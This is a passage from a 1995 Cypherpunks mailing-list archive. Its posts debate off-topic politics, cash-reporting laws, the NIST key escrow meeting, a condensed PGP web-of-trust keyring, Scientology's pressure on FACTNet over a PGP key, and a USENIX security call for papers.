privacy is a very "patriot" thiung to want to do. But this isn't a list for "patriot"s. > CyPherpunks appears to be a lot of peole who are against big brothert > government, and quite probably for restoring the constitution...am I right? Cypherpunks is a list for people interested in cryptography and its impact on privacy, law, society, etc. It is not a list for people to discuss libertarianism, socialism, constitutionalism, whether the president has just flown over you ranch in a black helicopter, whether the CIA was responsible for brainwashing your pet rat Algernon, whether David Koresh was the messiah, or how many members of the Federal Protective Service it takes to change a paper shredder. There are lots of places to discuss these topics on the net. There is only Cypherpunks for discussing the overall impact of cryptography on society, and this is a fairly good place to discuss crypto algorithms and the like because it is (amazingly) fairly high s/n compared to, say, sci.crypt. Please help out by not polluting one of the few places to discuss these issues with stuff you can talk about anywhere. Perry From starrd at iia2.org Thu Sep 7 17:58:43 1995 From: starrd at iia2.org (starrd) Date: Thu, 7 Sep 95 17:58:43 PDT Subject: Scientology and police visit XS4ALL Amsterdam In-Reply-To: <199509070600.QAA11675@molly.cs.monash.edu.au> Message-ID: On Thu, 7 Sep 1995, Jiri Baum wrote: > > >: : >>: OT7-48 > >: : >>: 1. Find some plants, trees, etc., and communicate to them > >: : >>: individually until you know they received your communication. > >: : >>: 2. Go to a zoo or a place with many types of life and communicate > >: : >>: with each of them until you know the communication is > >: : >>: received and, if possible, returned. > I gotta read more of this drivil! ROTFL! ROTFL!!! No wonder they dont want it out! They look like tey belong in the funny-farm....Have you ever seen those cute uniforms they wear? [really! Hollywood california, I have *been* to their "church"] especially the girls, reminds me of school-uniforms, but they are all so grown up [yum!] but with the minds of a moron....[see above drivil they read] I know this is somewhat off-topic, but I just *had* to say it! ||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP 7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf 9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig= =0Tlq -----END PGP PUBLIC KEY BLOCK----- From ghio at c2.org Thu Sep 7 18:02:47 1995 From: ghio at c2.org (Matthew Ghio) Date: Thu, 7 Sep 95 18:02:47 PDT Subject: Commercial Speech over Internet product In-Reply-To: <9508078105.AA810503582@snail.rsa.com> Message-ID: > Here's an article about a commercial company that is doing speech >over the Internet. Maybe someone would like to help them add encryption. > --Bob Baldwin, speaking for myself only. The program is a sound-listening extention for web-browsers. There is really no use for crypto because it's only processing information which is already public. From starrd at iia2.org Thu Sep 7 18:09:02 1995 From: starrd at iia2.org (starrd) Date: Thu, 7 Sep 95 18:09:02 PDT Subject: ON OFF-TOPIC In-Reply-To: <199509080057.UAA05313@frankenstein.piermont.com> Message-ID: On Thu, 7 Sep 1995, Perry E. Metzger wrote: > Date: Thu, 07 Sep 1995 20:57:32 -0400 > From: Perry E. Metzger > To: starrd > Cc: cypherpunks at toad.com > Subject: Re: ON OFF-TOPIC > > > starrd writes: > > On Thu, 7 Sep 1995, Perry E. Metzger wrote: > > > > > > Was this really needed? > > > > Yes, it is my bet that there are some patriots in this list. > > Pardon, but I don't care. There are also several socialists on this > list. Shall I help them out by posting a long tract on the labor > theory of value? There are several religious christians here. Shall we > begin to discuss the divinity of Jesus? There are also some Jews here > -- we could have a bunch of religious debates, and the atheists could > kick in some mud, too. There are lots of folks here who wear shoes -- > perhaps we could discuss the merits of different brands. > Nope. but the patriots & the cyPHerpunks share a common goal, and belief that it is none of the government's business what we think or want to share with our computers. > > The desire > > to protect one's privacy is a very "patriot" thiung to want to do. > > But this isn't a list for "patriot"s. Yes it is. This list is for anyone who wants to preserve their privacy, but I do understand what you really meant. :-^) > > CyPherpunks appears to be a lot of peole who are against big brother > > government, and quite probably for restoring the constitution...am I right? > > Cypherpunks is a list for people interested in cryptography and its > impact on privacy, law, society, etc. It is not a list for people to > discuss libertarianism, socialism, constitutionalism, whether the > president has just flown over you ranch in a black helicopter, whether > the CIA was responsible for brainwashing your pet rat Algernon, > whether David Koresh was the messiah, or how many members of the > Federal Protective Service it takes to change a paper shredder. Agreed > > There are lots of places to discuss these topics on the net. There is > only Cypherpunks for discussing the overall impact of cryptography on > society, and this is a fairly good place to discuss crypto algorithms > and the like because it is (amazingly) fairly high s/n compared to, > say, sci.crypt. Please help out by not polluting one of the few places > to discuss these issues with stuff you can talk about anywhere. Again, I agree with you Perry. In fact on a crypto-note [is that a word?] I would enjoy some discussion on SecDrv 1.4....anyone wanna take about it v. PGP? [is it as secure as PGP?] ||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP 7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf 9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig= =0Tlq -----END PGP PUBLIC KEY BLOCK----- From tcmay at got.net Thu Sep 7 18:09:40 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Sep 95 18:09:40 PDT Subject: Legality of Cash Transactions Message-ID: At 12:05 AM 9/8/95, Tobin T Fricke wrote: >>letting it happen, and using cash instead of credit, is the smart answer > >I'm somewhat surprized at how much of an issue this is. The >federal government prints up nice green paper for us to pay for >things with. It's annonymous (to a large extent), univerally >accepted (most of the time), fairly untracably (unless you >really want to), easily available, doesn't collect interest, >free to use, etc. No one is forcing anyone to use credit >cards, etc.. Then again, being a kid, I have never bought >anything with anything other than cash on the spot... I agree with what I think your sentiment is, but bear in mind that "cash transactions" are in fact limited by various laws and regulations about reporting cash payments. Try buying a car with cash, especially a car costing over $10,000. Black Unicorn posted an account a while back (sometime last year) of his efforts to pay cash for a new car. The restrictions on cash are mostly oriented toward ostensibly stopping "drug profits" from being used to buy expensive items. The usual cash figure that invokes special laws is $10,000, with "structuring" of sub-$10K cash transfers an additional issue. I foresee more restrictions coming, not fewer. Several of us have written extensively on this subject. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From pfarrell at netcom.com Thu Sep 7 18:18:20 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Thu, 7 Sep 95 18:18:20 PDT Subject: Notes from NIS&T Key Escrow Export conference. Message-ID: <76629.pfarrell@netcom.com> "Peter Trei" writes: > I think we can infer from this that the USG has, or soon expects to have, > the ability to brute 64 bits of key. That is what I heard (implied) too. If not today, in a reasonably foreseeable future. Remember, this is not an issue today, only weirdos such as the c'punks care today. The govies move slowly. They are setting the stage for tomorrow. >> It is clear that this meeting is a shame. Everyone in industry > A shame certainly, but I suspect you meant 'sham' (not a spelling flame, > the difference in meaning is important). Sorry for the typo, yes, I meant sham, fake, theater, all smoke and mirrors, nothing sincere, etc. See reference to "stage" above. All typos are mine. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From sdw at lig.net Thu Sep 7 18:49:37 1995 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 7 Sep 95 18:49:37 PDT Subject: Commercial Speech over Internet product In-Reply-To: Message-ID: > > Here's an article about a commercial company that is doing speech > >over the Internet. Maybe someone would like to help them add encryption. > > --Bob Baldwin, speaking for myself only. > > The program is a sound-listening extention for web-browsers. There is > really no use for crypto because it's only processing information which > is already public. That's not necessarily true: I could setup a web server to only listen to a socket that a local ssh socket proxy could connect to. Restrict the ssh session for a particular key to only allow connection to that one socket. Then the connecting party would need ssh running with socket proxy near(er) their client system and the public key. Assuming that you have a Unix workstation with audio listening software or a nearby PC it would be easy to setup. Internet/Web accessible RSA protected, session encrypted voice mail. Now if someone would just port ssh to the PC as a selective Winsock wedge... (I'd love an example of Winsock wedge code (A la Surfwatch)!!!) I have a neighbor that develops one of the commercial TCP/IP stacks, so it's quite possible I could convince him to help. With things like ssh, it's already very easy to create secure tunnels. It wouldn't be too tough to modify a proxy to use ssh style connections if an initial connection was found to be encrypted (or a key was cached for a URL). Of course, IPsec is coming... sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From doug at Eng.Auburn.EDU Thu Sep 7 19:05:07 1995 From: doug at Eng.Auburn.EDU (Doug Hughes) Date: Thu, 7 Sep 95 19:05:07 PDT Subject: Notes from NIS&T Key Escrow Export conference. In-Reply-To: <76629.pfarrell@netcom.com> Message-ID: On Thu, 7 Sep 1995, Pat Farrell wrote: > > >> It is clear that this meeting is a shame. Everyone in industry > > A shame certainly, but I suspect you meant 'sham' (not a spelling flame, > > the difference in meaning is important). > > Sorry for the typo, yes, I meant sham, fake, theater, all smoke and > mirrors, nothing sincere, etc. See reference to "stage" above. > > In this context, I think burlesque fits remarkably well. ;) (Brings to mind a bunch of cross-dressors doing big theatre numbers in exotic costumes) ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug at eng.auburn.edu Apple T-shirt on Win95 - "Been there, done that" From unicorn at polaris.mindport.net Thu Sep 7 19:12:32 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Thu, 7 Sep 95 19:12:32 PDT Subject: cryptography eliminates lawyers? In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Duncan Frissell wrote: > > > On Wed, 6 Sep 1995, Buford Terrell wrote: > > > How could crypto put lawyers out of business? People would still > > have disagreements; plans would still go wrong; cars would still > > crash. More important, transactions would still need to be > > structured to carry out the desires of the parties while minimizing > > risks. > > > > Good communications technology, including crypto, could make lawyering > > more efficient, but I suspect the savings would be minimal. > > Well, if crypto reduces the role of government in human affairs, it will > reduce work for lawyers. This first, I see.... Telecoms will certainly break the professional > monopoly of lawyers (and other professionals). This I don't. How do you mean exactly? > > DCF > From hallam at w3.org Thu Sep 7 19:17:10 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 7 Sep 95 19:17:10 PDT Subject: ON OFF-TOPIC In-Reply-To: Message-ID: <9509080216.AA07325@zorch.w3.org> >Nope. but the patriots & the cyPHerpunks share a common goal, and belief >that it is none of the government's business what we think or want to >share with our computers. Poor you, the only major political party to come out with a pro crypto statement is a socialist party. The problem is currently with the right wing, right wing democrats such as Clinton and practically all the Republicans. Crypto is outsi]de the left right debate which centers on ecconomic goals, whether to help the poor or the rich. The crypto debate is on the authoritarian/libertarian axis which is orthogonal. Geroge Orwell was a socialist, John Stuart Mill a Liberal, both had very anti-authoritarian views which used to be known as libertarian. If you want a debate on how to convince the authoritarians then perhaps you will get some interest. Trying to make crypto control out to be a left/right or pro/anti gun control issue is no more relevant than the pro/anti abortion debate. Phill From robl at on-ramp.ior.com Thu Sep 7 19:33:40 1995 From: robl at on-ramp.ior.com (Rob L) Date: Thu, 7 Sep 95 19:33:40 PDT Subject: Collection of personal info In-Reply-To: Message-ID: > > Welcome, you will learn a lot of great material here, and yes it is > neato. I just wish it came pre-installed with WinDoze... Don't worry, as soon as it becomes polically correct, and MS can find a way to make $$ on it, it will be rammed down our throats in WinDoze.. :) From robl at on-ramp.ior.com Thu Sep 7 19:40:22 1995 From: robl at on-ramp.ior.com (Rob L) Date: Thu, 7 Sep 95 19:40:22 PDT Subject: ON OFF-TOPIC In-Reply-To: Message-ID: > > > > Was this really needed? > > Yes, it is my bet that there are some patriots in this list. The desire > to protect one's privacy is a very "patriot" thiung to want to do. > CyPherpunks appears to be a lot of peole who are against big brothert > government, and quite probably for restoring the constitution...am I right? I am one as well.. being pro-2nd amendment, and pro-1st.. and learning lots about the fight to protect them. Unlike some of the non-US readers in this list, I can see the clear connection between the 1st and 2nd amendment attacks.. if one falls, the other does as well. Both are slowly being whittled away to nothing (i.e. you can have only certain 'assault-style' guns, and you can only be guaranteed certain types of free speech) RobL From pfarrell at netcom.com Thu Sep 7 19:52:19 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Thu, 7 Sep 95 19:52:19 PDT Subject: Key Escrow Papers Message-ID: <81288.pfarrell@netcom.com> John Young writes: > Perhaps someone, Pat Farrell or another, would be willing > to make them available on a homepage or ftp site. If so we > will send them over. I will gladly put up any nist-meeting papers, comments, drafts, etc. on my webpage. Please send them to me. (pfarrell at netcom.com) I am even willing to type in some, but that is known to cause typos, as I can't type, and even spellcheckers can't tell real words such as 'sham' from 'shame' Right now, I'm pretty down on the two days, but lets keep the information flowing. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From don at cs.byu.edu Thu Sep 7 19:58:18 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Thu, 7 Sep 95 19:58:18 PDT Subject: Announce: Web of Trust Ring Message-ID: <199509071832.MAA00480@wero.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- WEB OF TRUST KEYRING GENERATION PROJECT I have completed my project to make a condensed version of the keyserver PGP keyrings, containing only the "web of trust" inter-related keys. My methods were rather crude, and unfortunately only extracted those people who have signed someone (already on the list) else's key. That means that people who are well connected on the web of trust are included, while those people who only receive signatures from well-connected people are not included. The keyfile is approximately 1 megabyte, as opposed to 5-6 in the keyservers. Building it required 12 successive passes to the MIT keyring, each requiring 4-6 hours on my poor 386. I also made a subsequent pass using the UNIMI keyring. To seed the list I used warlord at mit.edu (Uh Derek? Hello??) and those keynumbers that cpunks mailed me. (Unfortunately some people sent only their key blocks, which I didn't use. Also, my server "lost" mail _twice_ due to "disk crash" while I was collecting key numbers.) I assume that requiring 13 passes means that the longest possible chain with a single connection (not necessarily a trust connection) to one of the seed keys is 12 keys. All included keys are exactly as they are on keyservers. The keyring can be trivially validated as much as possibly simply by validating one of the well-connected keys, like the ones that come with PGP. Warning: not responsible for assigning trust levels for all those people. That's your job. Have fun. Why did I do this: 1) Because I wanted to. 2) Because I really had nothing better to do with my CPU time. 3) wait, wait, ok for reals: 1) Because I want a web of trust keyring for myself, and that big old 5+ meg clunker keyfile is tooooo slow to use. 2) Because I feel that a DNS-style keyserver would not suit many web-of-trust activities that I wanted the keyring for, IE: pgp aware tools like news and mail readers for on-the-fly validation. 3) Because I feel that a system like this would encourage strengthening the web-of-trust, ie, trusting the KEYS. The current system has a lot of disjointed keys (uh, 4 meg worth I guess, eh?) which I found myself trusting simply because they were on the Keyservers. While this facilitates creation of a stable nym(*), real or not, I found myself even trying to justify to others trusting a key simply because it was on a keyserver. * = I agree with Bill Steward that we are a bit obsessed on True Names(tm) bit. I understand when Someone(tm) like Derek Atkins wants to see a True Name ID card(tm), but I'm sympathetic to having Nym signing, with the problem to overcome being simply the man-in-the-middle thwarting. Updates: Currently I am not really planning to do much in the way of updates to this, unless people actually are interested in updates. To be frank, this keyring is what I'm dropping into my own PGP, other than that it's not too exciting. If you get a copy, please tell me what you think of the project. The location is ftp to bert.cs.byu.edu, pub/donring.pgp. Unfortunately I don't know if you can tack that together as a ftp:// address. If you do, try ~ftp/pub/donring.pgp for good measure. I have suggested in the past that keyserver software could be modified to update the web of trust (using a keyfile such as mine for a base) instead of accepting just any key. I am not capable of making such modifications to the keyserver program, nor do I know of a keyserver operator who is willing to run such a system. A "for real" web of trust keyserver would want to fully expand my keyring by adding what I left out - those keys who are signed by included keys, but are not themselves included because they were not a seed and have not signed an included key. Having coded that, an update system that checks for a relation to a already-included key would be trivial. A second issue is that "The Web" of trust depends on the keys used to seed it. It's very possible that many of unimi's (for example) key file (500k bigger than MIT) keys do not have signatures connecting them to the people who came out with PGP, but have a robust web of trust none the less. Unless the project can obtain a seed which connects to that web, none of it is included. However, as I stated, that is a fact which will _encourage_ people to seek each other out for key signing. I suppose I could also make a list of the keyring generation script, if anyone actually wanted to ftp it. It would take between 15 and 35 hours to run on a 386 Linux box such as mine, mere hours on a big, fast box. There is really no need for it except to regenerate the keyring, for paranoia purposes or other reasons. Don -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBME6dqsLa+QKZS485AQFiBwL/boAb6BOdvcVHVyV+rGRmMTNk8iibcXvX kdngbRLrBEc2r4pJkuNpDvT2M/GmmGEGYxiAXKV9LDmWa7RLnCicjidP1RJVcu+3 xtVeO9PF+4ZecgEUJl4j6JdPEE52guOr =nm0W -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed * This user insured by the Smith, Wesson, & Zimmermann insurance company * From modemac at netcom.com Thu Sep 7 20:15:52 1995 From: modemac at netcom.com (Modemac) Date: Thu, 7 Sep 95 20:15:52 PDT Subject: Scientology tries to break PGP - and fails? Message-ID: <199509080312.UAA03808@netcom15.netcom.com> News Flash! According to an informed source, the so-called "church" of Scientology is trying to force Larry Wollersheim to give them his de-encryption code for PGP. Larry Wollersheim is the director of FACTNet, a Colorado BBS that specializes in distributing information about religious cults - especially the Church of Scientology. Scientologists raided FACTNet recently and seized its hardware and records recently, in a case that has spread news of the Scientology wars all over the Internet. Scientology has been in possession of Larry Wollersheim's computer records for quite a while now - at least three weeks, I believe. They have been scanning it for what they claim to be "copyright violations." Yet, their list of scanning criteria also includes a list of 34 names of their critics and enemies, including a famous Netizen named "Rogue Agent." Yet it seems that despite all their efforts to get what they want, they can't break PGP - so they have to force Wollersheim to reveal the key. Mr. Wollersheim has stated that he will go to jail before he reveals his encryption key. Please forward this note to all interested parties. Call this one: BIG WIN FOR PGP! For more information on Scientology's war against the Internet, read the many Web pages set up to cover the story. My own page, an "Introduction to Scientology," is: http://www.tiac.net/users/modemac/cos.html It includes a link to the FACTNet Web page, as well as Ron Newman's famous Web page: "The Church of Scientology vs. the Net." From tcmay at got.net Thu Sep 7 20:26:22 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Sep 95 20:26:22 PDT Subject: Correction about who opposes crypto regulations.... Message-ID: At 2:16 AM 9/8/95, hallam at w3.org wrote: >>Nope. but the patriots & the cyPHerpunks share a common goal, and belief >>that it is none of the government's business what we think or want to >>share with our computers. > >Poor you, the only major political party to come out with a pro crypto >statement >is a socialist party. On the contrary, the Libertarian Party has come out strongly in favor of cryptography and privacy, and they are consistently either #3 or #4 in popularity. (I believe Peace and Freedom is usually #4 and LP is usually #3.) Their home page (http://www.access.digex.net/~lphq/lphq.html) says: "The LPHQ is the center of activities of the Libertarian Party, the third largest political party in the U.S. We stand for individual liberty, both in terms of personal and financial freedom." It is impossible to argue that the Libertarian Party is opposed in any way to the right to encrypt, and their 1994 platform makes this clear: "We oppose all proposed regulations of civilian research on encryption methods. We also oppose government classification of such research or requirements that deciphering methods be disclosed to the government." I point this out not to argue in favor of the LP here, but to correct a seriously incorrect statement. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Thu Sep 7 20:31:29 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Sep 95 20:31:29 PDT Subject: Shams and Shame Message-ID: At 2:34 AM 9/8/95, Pat Farrell wrote: >I am even willing to type in some, but that is known to cause typos, >as I can't type, and even spellcheckers can't tell real words >such as 'sham' from 'shame' Yeah, it's a real sham you can't spel. --Tin May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From frissell at panix.com Thu Sep 7 20:40:09 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 7 Sep 95 20:40:09 PDT Subject: cryptography eliminates lawyers? In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Black Unicorn wrote: > Telecoms will certainly break the professional > > monopoly of lawyers (and other professionals). > > This I don't. How do you mean exactly? Licensing requires the ability to outlaw unlicensed transactions. Since the Net trumps censorship and allows consultations at a distance, it cracks licensing, DCF From dr261 at cleveland.Freenet.Edu Thu Sep 7 21:06:29 1995 From: dr261 at cleveland.Freenet.Edu (Tobin T Fricke) Date: Thu, 7 Sep 95 21:06:29 PDT Subject: Notes from NIS&T Key Escrow Export conference. Message-ID: <199509080406.AAA25183@kanga.INS.CWRU.Edu> >I hope this gets to you before the conference is over. I would REALLY >like to hear the government response to the question: >"If keys are escrowed, what purpose does a 64 bit limit serve?" I thought that Bruce Schneier (sp?) had a good point at DefCon: (something like:) "The US Government thinks that there is a type of criminal smart enough to use encryption and dumb enough to use encryption provided by the US Government..."(lots of applause). I think that is a good point. Of course, if all non-escrowed encryption techniques were made illegal, then the criminals would just have another broken law under their belt if they used strong encryption. After all, an outlaw is an outlaw because he has broken laws, so what sense does it make to make more laws for him to break? Hmph. Also, semi unrelated: How do the copyright, pornography, and California Penal Code 502.7 laws fit in with the first ammendment? [Please send a cc: of any replies to dr261 at cleveland.freenet.edu because I am no longer on cypherpunks )-: I can't handle the mail volume any longer now that I have homework to do.. ] -- Tobin Fricke (aka LightRay) The Digital Forest BBS (714)586-6142 dr261 at kanga.ins.cwru.edu KE6WHF Amateur Radio, 1:103/925 fido From joelm at eskimo.com Thu Sep 7 21:29:12 1995 From: joelm at eskimo.com (Joel McNamara) Date: Thu, 7 Sep 95 21:29:12 PDT Subject: NIST Escrow Papers - Now Web Available Message-ID: <199509080429.VAA22176@mail.eskimo.com> Several of the scanned hand-outs (courtesy of John Young) for the NIST September 5 workshop on key escrow are now available on my Web page: http://www.eskimo.com/~joelm Papers include: The outlines of meeting topics of Raymond Kammer of NIST and Michael Nelson of the White House. (KAMMER.TXT - 7kb) Discussion Paper No. 4, "Example Potential Solutions for the Draft Export Criteria for Software Key Escrow Encryption," which offers example solutions for each of the ten criteria. (CRITERIA.TXT - 7kb) The Business Software Alliance's dissenting blast at the government's key escrow proposal and export limit. This paper was loudly applauded. (BSA.TXT - 19kb) Trusted Informations Systems's "Thoughts on the NIST Escrow Issues Meeting Discussion Papers." (TIS.TXT - 27kb) TECSEC Incorporated's "Private Escrow Key Management: A Method and its Issues." (TECSEC.TXT - 13kb) Dorothy Denning's "Comments on Draft Criteria for Software Key Escrow Exportability" and "Comments on Issues for Key Escrow Agents." (DENNING.TXT - 8kb) From yihchun at u.washington.edu Thu Sep 7 21:38:04 1995 From: yihchun at u.washington.edu (Yih-Chun Hu) Date: Thu, 7 Sep 95 21:38:04 PDT Subject: ON OFF-TOPIC In-Reply-To: <9509080216.AA07325@zorch.w3.org> Message-ID: On Thu, 7 Sep 1995 hallam at w3.org wrote: > > >Nope. but the patriots & the cyPHerpunks share a common goal, and belief > >that it is none of the government's business what we think or want to > >share with our computers. > > Poor you, the only major political party to come out with a pro crypto statement > is a socialist party. I think the libertarian position is inherently pro-crypto. Besides, the French are socialist, and well, as far as crypto goes... > > The problem is currently with the right wing, right wing democrats such as > Clinton and practically all the Republicans. > Whatever. Clinton proposed crypto, some democrat wrote the electronic decency act. (In fact Gingrich was against it) > If you want a debate on how to convince the authoritarians then perhaps you will > get some interest. Trying to make crypto control out to be a left/right or > pro/anti gun control issue is no more relevant than the pro/anti abortion > debate. I think that to some extent it is very relavant to gun control in that both can be abused and that both help the law-abiding citizen do things. +---- Yih-Chun Hu (finger:yihchun at cs.washington.edu) ----------------------+ | http://www.cs.washington.edu/homes/yihchun yihchun at cs.washington.edu | | http://weber.u.washington.edu/~yihchun yihchun at u.washington.edu | +---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+ | 1024/E50EC641 B2 A0 DE 9E 36 C0 EB A6 F9 3E D2 DD 2F 27 74 79 | | 2047/DF0403F9 18 EB 62 C8 7F 06 04 67 42 76 24 E2 99 D1 07 DC | +---- Random Thought ------------------------------------------------------+ |I conducted an experiment to test Murphy's Law, but everything went wrong.| +--------------------------------------------------------------------------+ From rsalz at osf.org Thu Sep 7 21:38:16 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 7 Sep 95 21:38:16 PDT Subject: Usenix symposium on crypto applications Message-ID: <9509080437.AA08201@sulphur.osf.org> Newsgroups: comp.org.usenix,comp.org.uniforum,comp.org.sug,comp.unix.admin,comp.unix.large,comp.org.decus,comp.security.unix Path: paperboy.osf.org!bone.think.com!blanket.mitre.org!agate!spool.mu.edu!howland.reston.ans.net!tank.news.pipex.net!pipex!in2.uu.net!usenix!toni >From: toni at usenix.org (Toni Veglia) Subject: 6th USENIX UNIX Security Symposium - Call-for-Papers Message-ID: Reply-To: toni at usenix.org (Toni Veglia) Organization: USENIX Association, Berkeley, CA Date: Wed, 6 Sep 1995 19:25:37 GMT Lines: 218 Xref: paperboy.osf.org comp.org.usenix:3623 comp.org.uniforum:20 comp.org.sug:940 comp.unix.admin:33851 comp.unix.large:1699 comp.org.decus:6147 comp.security.unix:19702 Announcement and Preliminary Call for Papers 6th USENIX UNIX Security Symposium Focusing on Applications of Cryptography July 22-25, 1996 Fairmont Hotel San Jose, California Sponsored by the USENIX Association, the UNIX and Advanced Computing Systems Professional and Technical Association Co-sponsored by UniForum (pending) In cooperation with: The Computer Emergency Response Team (CERT), and IFIP WG 11.4 Important Dates Dates for Refereed Paper Submissions Extended abstracts due: Mar 19, 1996 Program Committee decisions made: Apr 15, 1996 Camera-ready final papers due: June 10, 1996 Registration Materials Available: End April 1996 Program Committee Program Chair: Greg Rose, Sterling Software. Fred Avolio, Trusted Information Systems, Inc. Steve Bellovin, AT&T Bell Laboratories Brent Chapman, Great Circle Associates Diane Coe, Mitre Ed DeHart, CERT Dan Geer, Open Market Inc. Peter Gutmann, University of Auckland Kent Landfield, Sterling Software Clifford Neuman, Information Sciences Institute Avi Rubin, Bellcore Eugene Spafford, COAST Laboratory, Purdue University Ken van Wyk, Defense Information Systems Agency Karen Worstell, The Boeing Company Readers: Matt Bishop, U.C. Davis; Phil Karn, Qualcomm Overview The goal of this symposium is to bring together security and cryptography practitioners, researchers, system administrators, systems programmers, and others with an interest in applying cryptography, network and computer security, and especially the area where these overlap. The focus on applications of cryptography is intended to attract papers in the fields of electronic commerce and information processing, as well as security. Please note that papers about new cryptographic algorithms are not solicited; however new applications are. This will be a four day single track symposium with tutorials, refereed and technical presentations, and panel discussions. Tutorials will take place the first two days followed by two days of technical sessions. Tutorials July 22-23 Tutorials for both technical staff and managers will provide immediately useful, practical information on topics such as local and network security precautions, what cryptography can and cannot do, security mechanisms and policies, firewalls and monitoring systems. Technical Sessions July 24-25 In addition to the keynote presentation, the technical program includes refereed papers and invited talks. There may be panel sessions. There will be Birds-of-a-Feather sessions and Works-in- Progress Reports on two evenings. You are invited to make suggestions to the program committee via email . Papers that have been formally reviewed and accepted will be presented during the symposium and published in the symposium proceedings. Proceedings of the symposium will be published by USENIX and will be provided free to technical session attendees; additional copies will be available for purchase from USENIX. Symposium Topics Presentations are being solicited in areas including but not limited to: *Anonymous transactions *Applications of cryptographic techniques *Attacks against secure networks/machines *Cryptanalysis and codebreaking as attacks *Cryptographic tools *Electronic commerce security *Firewalls and firewall toolkits *Legislative and legal issues *Case studies *Computer misuse and anomaly detection *File and File system security *Network security *Security and system management *Security in heterogeneous environments *Security incident investigation and response *Security tools *User/system authentication *Penetration testing *Malicious code analysis Note that this symposium is not about new 